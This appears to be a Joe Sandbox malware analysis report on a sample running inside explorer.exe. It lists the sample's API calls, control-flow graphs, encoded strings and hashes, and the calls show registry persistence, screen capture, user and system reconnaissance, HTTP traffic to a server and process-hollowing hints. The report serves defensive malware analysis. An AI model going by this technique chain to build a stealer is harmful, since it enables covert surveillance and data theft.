2f1e00b 25 API calls 37418->37423 37422 2f1e4f2 37419->37422 37424 2f0ea55 __Getctype 11 API calls 37420->37424 37421->37416 37501 2f1c0f3 25 API calls 2 library calls 37422->37501 37425 2f1e710 37423->37425 37430 2f1e82a 37424->37430 37425->37420 37427 2f1e037 25 API calls 37425->37427 37429 2f1e722 37427->37429 37428 2f1e520 37428->37408 37444 2f1e52b __fread_nolock 37428->37444 37429->37420 37431 2f1e72b 37429->37431 37448 2f1e87e 37430->37448 37507 2f17e35 15 API calls 3 library calls 37430->37507 37432 2f17c06 _free 14 API calls 37431->37432 37435 2f1e736 GetTimeZoneInformation 37432->37435 37433 2f1e8f5 37437 2f1e6d1 41 API calls 37433->37437 37452 2f1e7fa 37435->37452 37453 2f1e752 __fread_nolock 37435->37453 37436 2f1e8ec 37438 2f1e430 41 API calls 37436->37438 37439 2f1e8f2 37437->37439 37438->37439 37441 2f17c06 _free 14 API calls 37439->37441 37440 2f1e8a4 37443 2f17c06 _free 14 API calls 37440->37443 37442 2f1e900 37441->37442 37447 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37442->37447 37443->37448 37502 2f1e3e9 42 API calls 6 library calls 37444->37502 37445 2f1e89d 37445->37440 37446 2f1e8cc 37445->37446 37449 2f17c06 _free 14 API calls 37446->37449 37450 2f1e90e 37447->37450 37448->37433 37448->37436 37449->37448 37450->37394 37452->37394 37504 2f12427 37 API calls __Getctype 37453->37504 37455 2f1e7d5 37505 2f1e910 42 API calls 4 library calls 37455->37505 37457 2f1e7e6 37506 2f1e910 42 API calls 4 library calls 37457->37506 37460 2f1e576 37461 2f1e6a1 37460->37461 37503 2f1e3e9 42 API calls 6 library calls 37460->37503 37461->37417 37463 2f1e6e1 37462->37463 37464 2f1e063 25 API calls 37463->37464 37465 2f1e6fe 37464->37465 37466 2f1e820 37465->37466 37467 2f1e00b 25 API calls 37465->37467 37468 2f0ea55 __Getctype 11 API calls 37466->37468 37469 2f1e710 37467->37469 37472 2f1e82a 37468->37472 37469->37466 37470 2f1e037 25 API calls 37469->37470 37471 2f1e722 37470->37471 37471->37466 37473 2f1e72b 37471->37473 37475 2f1e87e 37472->37475 37511 2f17e35 15 API calls 3 library calls 37472->37511 37474 2f17c06 _free 14 API calls 37473->37474 37478 2f1e736 GetTimeZoneInformation 37474->37478 37476 2f1e8f5 37475->37476 37479 2f1e8ec 37475->37479 37480 2f1e6d1 41 API calls 37476->37480 37492 2f1e7fa 37478->37492 37493 2f1e752 __fread_nolock 37478->37493 37481 2f1e430 41 API calls 37479->37481 37482 2f1e8f2 37480->37482 37481->37482 37484 2f17c06 _free 14 API calls 37482->37484 37483 2f1e8a4 37486 2f17c06 _free 14 API calls 37483->37486 37485 2f1e900 37484->37485 37489 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37485->37489 37486->37475 37487 2f1e89d 37487->37483 37488 2f1e8cc 37487->37488 37490 2f17c06 _free 14 API calls 37488->37490 37491 2f1e90e 37489->37491 37490->37475 37491->37394 37492->37394 37508 2f12427 37 API calls __Getctype 37493->37508 37495 2f1e7d5 37509 2f1e910 42 API calls 4 library calls 37495->37509 37497 2f1e7e6 37510 2f1e910 42 API calls 4 library calls 37497->37510 37499->37392 37500->37414 37501->37428 37502->37460 37503->37461 37504->37455 37505->37457 37506->37452 37507->37445 37508->37495 37509->37497 37510->37492 37511->37487 37512->37365 37513->37367 37514->37372 37515->37374 37516->37379 37517->37381
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 02EE64E3
                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 02EE6511
                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(80000001), ref: 02EE651A
                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 02EE663C
                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 02EE665F
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 02EE67BD
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02EE6894
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 02EE68E0
                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(80000002), ref: 02EE6668
                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02EE6D5E
                                                                                                                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000,F48E75C7,00000000), ref: 02EE6DEA
                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 02EE6F62
                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE71CD
                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 02EE7226
                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 02EE722F
                                                                                                                                                                                                                        • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 02EE7277
                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 02EE72CA
                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 02EE72D3
                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 02EE72DF
                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 02EE72F4
                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 02EE7304
                                                                                                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02EE732A
                                                                                                                                                                                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 02EE733E
                                                                                                                                                                                                                        • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 02EE735A
                                                                                                                                                                                                                        • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 02EE7387
                                                                                                                                                                                                                        • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 02EE740E
                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 02EE741B
                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 02EE7428
                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 02EE7430
                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 02EE743A
                                                                                                                                                                                                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 02EE7441
                                                                                                                                                                                                                        • GdiplusShutdown.GDIPLUS(?), ref: 02EE74E3
                                                                                                                                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02EE75BA
                                                                                                                                                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 02EE7600
                                                                                                                                                                                                                        • GetSidIdentifierAuthority.ADVAPI32(?), ref: 02EE760D
                                                                                                                                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EE7721
                                                                                                                                                                                                                        • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02EE7748
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                                                                                                                                                                                        • String ID: $($0mpfQN7GHB==$2DErDuy=$NtUnmapViewOfSection$OS5n5H==$QSZn5H==$RDErDuyXC3R=$RDErDuyXCUd=$RDErDuyXCkB=$RDErDuyXCkF=$Zy4g3ySq$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                                                                                                                                        • API String ID: 1729688432-835794773
                                                                                                                                                                                                                        • Opcode ID: 9d78124ac42f59eb4e5ad6d9a9163f1c240e682e9e1ff8ec1cf81bf9e2469525
                                                                                                                                                                                                                        • Instruction ID: 5f8fbeadde2e466a049a73e561e8d321a4fb61957308eea6f164196fefd11d3d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d78124ac42f59eb4e5ad6d9a9163f1c240e682e9e1ff8ec1cf81bf9e2469525
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0D23671A402189FEF18DF24CC84BDDBB7AEF55344F508298E50AA72D1DB749A94CF90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EEA270: GetTempPathA.KERNEL32(00000104,?,F48E75C7,?,00000000), ref: 02EEA2B7
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 02EEB77B
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEB8B5
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEB9EF
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 02EE64E3
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 02EE6511
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000001), ref: 02EE651A
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBB29
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBC63
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 02EE663C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 02EE665F
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000002), ref: 02EE6668
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBD9D
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBED7
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 02EE67BD
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC011
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02EE6894
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 02EE68E0
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC14B
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC285
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC3BF
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(?), ref: 02EE6D5E
                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 02EEC4FF
                                                                                                                                                                                                                          • Part of subcall function 02EE93D0: GetVersionExW.KERNEL32(0000011C,F48E75C7,76F90F00), ref: 02EE944A
                                                                                                                                                                                                                          • Part of subcall function 02EE93D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE94AB
                                                                                                                                                                                                                          • Part of subcall function 02EE93D0: GetProcAddress.KERNEL32(00000000), ref: 02EE94B2
                                                                                                                                                                                                                          • Part of subcall function 02EE93D0: GetNativeSystemInfo.KERNELBASE(?), ref: 02EE9573
                                                                                                                                                                                                                          • Part of subcall function 02EE93D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE9577
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                                                                                                                                                                                        • String ID: V2co3TPs$VV3C$VX3k4dC=$WVRAMr==$Ymct5x7r$Z2cr2x7w
                                                                                                                                                                                                                        • API String ID: 3951112935-1902282912
                                                                                                                                                                                                                        • Opcode ID: ad151dc17bace9eea8ae247c61e31c9f9802caa76197fca31d75c36851326879
                                                                                                                                                                                                                        • Instruction ID: a36ee7edca638610192b8927e5e989b6a433b7c5839ec652d23b49b10359af55
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad151dc17bace9eea8ae247c61e31c9f9802caa76197fca31d75c36851326879
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30924671A801089BEF08DBB8CD887DDBB72AF46318F64E21DE056B73D5D7758A808B51

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1323 2eee8d0-2eee94a GetUserNameA 1324 2eee951-2eee956 1323->1324 1324->1324 1325 2eee958-2eeec5a call 2f03f40 call 2f05f60 call 2f06300 call 2f05f60 call 2f06300 call 2f03030 call 2f05f60 call 2f06300 call 2f05f60 call 2f06300 call 2f05f60 call 2f06300 CoInitialize 1324->1325 1350 2eeec5c-2eeec79 CoCreateInstance 1325->1350 1351 2eeec85 1325->1351 1352 2eeec7f CoUninitialize 1350->1352 1353 2eef00b-2eef031 1350->1353 1354 2eeec87-2eeec90 1351->1354 1352->1351 1362 2eef0dc-2eef24b call 2f0b340 GetLocalTime CoUninitialize 1353->1362 1363 2eef037-2eef03c 1353->1363 1355 2eeecc7-2eeeced 1354->1355 1356 2eeec92-2eeeca7 1354->1356 1360 2eeecef-2eeed04 1355->1360 1361 2eeed24-2eeed4a 1355->1361 1358 2eeecbd-2eeecc4 call 2f09d26 1356->1358 1359 2eeeca9-2eeecb7 1356->1359 1358->1355 1359->1358 1364 2eef278-2eef27f call 2f0ea38 1359->1364 1366 2eeed1a-2eeed21 call 2f09d26 1360->1366 1367 2eeed06-2eeed14 1360->1367 1368 2eeed4c-2eeed61 1361->1368 1369 2eeed81-2eeeda7 1361->1369 1362->1354 1363->1351 1372 2eef042-2eef051 1363->1372 1366->1361 1367->1364 1367->1366 1376 2eeed77-2eeed7e call 2f09d26 1368->1376 1377 2eeed63-2eeed71 1368->1377 1370 2eeedd8-2eeedfc 1369->1370 1371 2eeeda9-2eeedb8 1369->1371 1382 2eeedfe-2eeee13 1370->1382 1383 2eeee33-2eeee59 1370->1383 1378 2eeedce-2eeedd5 call 2f09d26 1371->1378 1379 2eeedba-2eeedc8 1371->1379 1396 2eef06a-2eef0d7 CoUninitialize call 2f03030 * 4 call 2eee8d0 1372->1396 1397 2eef053-2eef065 CoUninitialize 1372->1397 1376->1369 1377->1364 1377->1376 1378->1370 1379->1364 1379->1378 1389 2eeee29-2eeee30 call 2f09d26 1382->1389 1390 2eeee15-2eeee23 1382->1390 1391 2eeee5b-2eeee70 1383->1391 1392 2eeee90-2eeeeb6 1383->1392 1389->1383 1390->1364 1390->1389 1400 2eeee86-2eeee8d call 2f09d26 1391->1400 1401 2eeee72-2eeee80 1391->1401 1393 2eeeeb8-2eeeec7 1392->1393 1394 2eeeee7-2eeef08 1392->1394 1403 2eeeedd-2eeeee4 call 2f09d26 1393->1403 1404 2eeeec9-2eeeed7 1393->1404 1405 2eeef0a-2eeef16 1394->1405 1406 2eeef36-2eeef4e 1394->1406 1396->1354 1397->1351 1400->1392 1401->1364 1401->1400 1403->1394 1404->1364 1404->1403 1415 2eeef2c-2eeef33 call 2f09d26 1405->1415 1416 2eeef18-2eeef26 1405->1416 1409 2eeef7c-2eeef94 1406->1409 1410 2eeef50-2eeef5c 1406->1410 1420 2eeef96-2eeefa2 1409->1420 1421 2eeefc2-2eeefda 1409->1421 1418 2eeef5e-2eeef6c 1410->1418 1419 2eeef72-2eeef79 call 2f09d26 1410->1419 1415->1406 1416->1364 1416->1415 1418->1364 1418->1419 1419->1409 1426 2eeefb8-2eeefbf call 2f09d26 1420->1426 1427 2eeefa4-2eeefb2 1420->1427 1428 2eef25a-2eef277 call 2f096b0 1421->1428 1429 2eeefe0-2eeefec 1421->1429 1426->1421 1427->1364 1427->1426 1436 2eeeff2-2eef000 1429->1436 1437 2eef250-2eef257 call 2f09d26 1429->1437 1436->1364 1441 2eef006 1436->1441 1437->1428 1441->1437
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02EEE91D
                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 02EEEC52
                                                                                                                                                                                                                        • CoCreateInstance.OLE32(02F3D05C,00000000,00000001,02F3D0BC,?), ref: 02EEEC71
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEEC7F
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEF053
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEF06A
                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 02EEF16C
                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 02EEF240
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Uninitialize$CreateInitializeInstanceLocalNameTimeUser
                                                                                                                                                                                                                        • String ID: @3P$IQsoCJYqBTT=$QS4It8==$QS4oCJYq$ZEcOMr==$fHVV4umsBx==$fHVV4yK3Bz1=
                                                                                                                                                                                                                        • API String ID: 1302556198-3926215408
                                                                                                                                                                                                                        • Opcode ID: dce80f8f484d0c8de88dbadc294e9807bae7fb1962661b468335931b49b13a1c
                                                                                                                                                                                                                        • Instruction ID: 0de9f9f88575ec077dffd88b53f8dd24b3acb869ea3cf086c5d8061154599bae
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dce80f8f484d0c8de88dbadc294e9807bae7fb1962661b468335931b49b13a1c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD427D71A402589FDF25CF24CC88BDDBBB6AF49308F5081D8E509A7291DB75AAC4CF91

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1458 2ef0370-2ef03bc 1459 2ef07c7-2ef07f2 call 2f03f40 1458->1459 1460 2ef03c2-2ef03c6 1458->1460 1466 2ef07f4-2ef0800 1459->1466 1467 2ef0820-2ef0838 1459->1467 1460->1459 1462 2ef03cc-2ef03d0 1460->1462 1462->1459 1464 2ef03d6-2ef0474 Sleep InternetOpenW InternetConnectA call 2f03030 call 2ee61f0 1462->1464 1490 2ef0478-2ef0494 HttpOpenRequestA 1464->1490 1491 2ef0476 1464->1491 1469 2ef0816-2ef081d call 2f09d26 1466->1469 1470 2ef0802-2ef0810 1466->1470 1471 2ef077e-2ef0796 1467->1471 1472 2ef083e-2ef084a 1467->1472 1469->1467 1470->1469 1474 2ef089b-2ef08a0 call 2f0ea38 1470->1474 1478 2ef086f-2ef088b call 2f096b0 1471->1478 1479 2ef079c-2ef07a8 1471->1479 1476 2ef0774-2ef077b call 2f09d26 1472->1476 1477 2ef0850-2ef085e 1472->1477 1476->1471 1477->1474 1487 2ef0860 1477->1487 1480 2ef07ae-2ef07bc 1479->1480 1481 2ef0865-2ef086c call 2f09d26 1479->1481 1480->1474 1488 2ef07c2 1480->1488 1481->1478 1487->1476 1488->1481 1496 2ef0496-2ef04a5 1490->1496 1497 2ef04c5-2ef0534 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 1490->1497 1491->1490 1498 2ef04bb-2ef04c2 call 2f09d26 1496->1498 1499 2ef04a7-2ef04b5 1496->1499 1510 2ef0538-2ef054e HttpSendRequestA 1497->1510 1511 2ef0536 1497->1511 1498->1497 1499->1498 1512 2ef057f-2ef05a7 1510->1512 1513 2ef0550-2ef055f 1510->1513 1511->1510 1516 2ef05a9-2ef05b8 1512->1516 1517 2ef05d8-2ef05f9 InternetReadFile 1512->1517 1514 2ef0575-2ef057c call 2f09d26 1513->1514 1515 2ef0561-2ef056f 1513->1515 1514->1512 1515->1514 1520 2ef05ce-2ef05d5 call 2f09d26 1516->1520 1521 2ef05ba-2ef05c8 1516->1521 1518 2ef05ff 1517->1518 1522 2ef0600-2ef06b0 call 2f0adc0 InternetReadFile 1518->1522 1520->1517 1521->1520
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • Sleep.KERNELBASE(000005DC,F48E75C7,?,00000000), ref: 02EF0402
                                                                                                                                                                                                                        • InternetOpenW.WININET(02F3CC08,00000000,00000000,00000000,00000000), ref: 02EF0411
                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02EF0435
                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 02EF047F
                                                                                                                                                                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 02EF053F
                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 02EF05F1
                                                                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 02EF06A0
                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 02EF06C7
                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 02EF06CF
                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 02EF06D7
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                                                                                                                                        • String ID: ZEcOMr==$fHVV4umsBx==$fHVV4yK3Bz1=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                        • API String ID: 1439999335-753573995
                                                                                                                                                                                                                        • Opcode ID: cbfe06fc437f9fc3735669152c9b7d708131f768244ed990d90be75587423eb2
                                                                                                                                                                                                                        • Instruction ID: 54686e522c34232110aac825fedffcf4952f34e65e4a3cf47d2722fcead446a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbfe06fc437f9fc3735669152c9b7d708131f768244ed990d90be75587423eb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EB126B1A401589BEB24DF28CC84B9DBB76EF41348F5081A9F609972D6DB70DAC0CF95

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
